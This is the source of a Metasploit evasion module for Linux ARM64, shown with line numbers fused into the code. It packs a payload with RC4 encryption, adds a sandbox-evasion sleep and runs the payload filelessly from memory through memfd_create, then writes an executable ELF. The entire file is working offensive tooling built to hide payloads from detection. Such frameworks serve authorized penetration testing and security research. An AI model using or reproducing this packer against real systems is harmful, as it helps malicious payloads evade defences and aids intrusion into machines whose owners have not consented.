Path: blob/master/modules/evasion/linux/aarch64/rc4_packer.rb
36035 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Evasion67include Msf::Payload::Linux::Aarch64::Rc4Decrypter8include Msf::Payload::Linux::Aarch64::ElfLoader9include Msf::Payload::Linux::Aarch64::SleepEvasion1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Linux RC4 Packer with In-Memory Execution',16'Description' => %q{17This evasion module packs Linux payloads using RC4 encryption18and executes them from memory using memfd_create for fileless execution.19Linux kernel version support: 3.17+20},21'Author' => ['Massimo Bertocchi'],22'License' => MSF_LICENSE,23'Platform' => 'linux',24'Arch' => [ARCH_AARCH64],25'Targets' => [['Linux ARM64/AArch64', {}]],26'DefaultTarget' => 027)28)2930register_options([31OptString.new('FILENAME', [true, 'Output filename', 'payload.elf']),32OptInt.new('SLEEP_TIME', [false, 'Sleep Time for Sandbox Evasion', 0]),33])34end3536def run37raw_payload = payload.encoded38if raw_payload.blank?39fail_with(Failure::BadConfig, 'Failed to generate payload')40end4142elf_payload = Msf::Util::EXE.to_linux_aarch64_elf(framework, raw_payload)43complete_loader = sleep_evasion(seconds: datastore['SLEEP_TIME']) + rc4_decrypter(data: (in_memory_load(elf_payload) + elf_payload))44final_elf = Msf::Util::EXE.to_linux_aarch64_elf(framework, complete_loader)4546File.binwrite(datastore['FILENAME'], final_elf)47File.chmod(0o755, datastore['FILENAME'])48end49end505152